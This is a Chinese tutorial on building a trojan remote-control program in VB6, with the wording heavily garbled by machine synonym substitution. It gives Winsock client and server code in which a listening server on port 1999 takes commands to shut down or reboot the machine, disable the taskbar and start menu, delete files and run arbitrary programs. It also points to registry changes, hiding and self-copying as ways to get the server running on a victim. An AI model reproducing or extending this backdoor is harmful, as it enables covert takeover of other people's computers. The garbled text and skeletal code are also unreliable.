用VB6.0编写“木马”程序

　　跷跷板，也称特伊洛跷跷板，称呼源于古希腊的特伊洛马传奇，是一种长途遏制软硬件。此刻搜集上时髦的跷跷板软硬件基础都是存户机/效劳器形式也即是所谓的c/s构造，暂时也有少许发端向b/s构造变化，在这边姑且不对b/s构造举行详谈，正文重要引见c/s构造其道理即是在本机径直启用运转的步调具有与运用者沟通的权力。所以即使不妨启用效劳器端（即被报复的计划机）的效劳器步调，就不妨运用相映的存户端东西存户步调径直遏制它了。底下来谈谈怎样用vb来实行它。

　　开始运用vb创造两个步调，一个为存户端步调client，一个为效劳器端步调systry。 　　在client工程中创造一个窗体，加载winsock控件，称为tcpclient，和议采用tcp，再介入两个文本框，用以输出效劳器的ip地方或效劳器名，而后创造一个按钮，按下之后就不妨对贯穿举行初始化了，代码如次：

private sub cmdconnect_click()　 if len(text1.text) = 0 and len(text2.text) = 0 then　　 msgbox ("请输出长机名或长机ip地方。")　　 exit sub　 else　　 if len(text1.text) > 0 then　　　 tcpclient.remotehost = text1.text　　 else　　　 tcpclient.remotehost = text2.text　　 end if　 end if　 tcpclient.connect　 timer1.enabled = true end sub

　　贯穿创造之后就不妨运用dataarrival事变处置所收到的数据了。 　　在效劳器端systry工程也创造一个窗体，加载winsock控件，称为tcpserver，和议采用tcp，在form_load事变中介入如次代码：

private sub form_load()　 tcpserver.localport = 1999　 tcpserver.listenend sub

　　筹备应答存户端步调的乞求贯穿，运用connectionrequest事变来应答户端步调的乞求，代码如次：

private sub tcpserver_connectionrequest(byval requestid as long)　 if tcpserver.state <> sckclosed then　　 tcpserver.close‘查看控件的 state 属性能否为封闭的。　 end if 　’即使不是，在接收新的贯穿之前先封闭此贯穿。　 tcpserver.accept requestidend sub

　　如许在存户端步调按下了贯穿按钮后，效劳器端步调的connectionrequest事变被触发，实行了之上的代码。即使不出不料，贯穿就被创造起来了。

[page_break]　　创造贯穿后效劳器端的步调经过dataarrival事变接受存户机端步调所发的训令运转既定的步调。如：把效劳器端的启动器名、目次名、文献名等传到存户机端，存户机端接受后用treeview控件以树状的情势表露出来，欣赏效劳器端文献目次；强迫封闭或重启效劳器端的计划机；樊篱工作栏窗口；樊篱发端菜单；依照存户机端传过来的文献名或目次名，而简略它；樊篱热启用键；运转效劳器端的任何步调；还囊括获得目的计划机屏幕图象、窗口及过程列表；激活、中断远端过程；翻开、封闭、挪动远端窗口；遏制目的计划机鼠目标挪动与举措；调换远端鼠目标安排键；在目的计划机模仿键盘输出，载入、上衣文献；索取、创造、窜改目的计划机体例备案表要害字；在远端屏幕上表露动静。dataarrival事变步调如次：

private sub tcpserver_dataarrival(byval bytestotal as long)　 dim strdata as string　 dim i as long　 dim mkey as string　 tcpserver.getdata strdata 　 ‘接受数据共存入strdata　 for i = 1 to len(strdata) 　　 ‘辨别strdata中的吩咐　　 if mid(strdata, i, 1) = "@" then　　　 mkey = left(strdata, i - 1) 　　　 ‘把吩咐id号惠存mkey　　　 ‘把吩咐参数惠存strdata 　　　 strdata = right(strdata, len(strdata) - i) 　　　 exit for　　 end if　 next i 　 select case val(mkey)　　 case 1　　 ‘启动器名、目次名、文献名　　 case 2　　　 强迫封闭效劳器端的计划机　　 case 3　　　 强迫重启效劳器端的计划机　　 case 4　　　 樊篱工作栏窗口；　　 case 5　　　 樊篱发端菜单； 　　 case 6　　　 依照存户机端传过来的文献名或目次名，而简略它； 　　 case 7　　　 樊篱热启用键；　　 case 8　　　 运转效劳器端的任何步调 　 end select end sub

　　存户机端用tcpclient.senddata发吩咐。吩咐囊括吩咐id和吩咐参数，它们用标记“@”隔绝。 　　其余，当存户机端割断与效劳器端的来接后，效劳器端运用tcpserver_close事变，来连接筹备接受存户机端的乞求，其代码如次：

private sub tcpserver_close()tcpserver.closetcpserver.listenend sub

　　这即是一个最基础的特洛伊跷跷板步调，只有你的呆板运转了效劳器端步调，那旁人就不妨在千里除外遏制你的计划机。至于怎样让效劳器端步调运转就要表现你的聪慧本领了，在我的源步调中有第一中学本领，是窜改体例备案表的本领。 　　胜利的特洛伊跷跷板步调要比这个搀杂少许，再有步调的湮没、机动复制、传递等题目要处置。劝告：万万不要用bo步调妨害旁人的体例。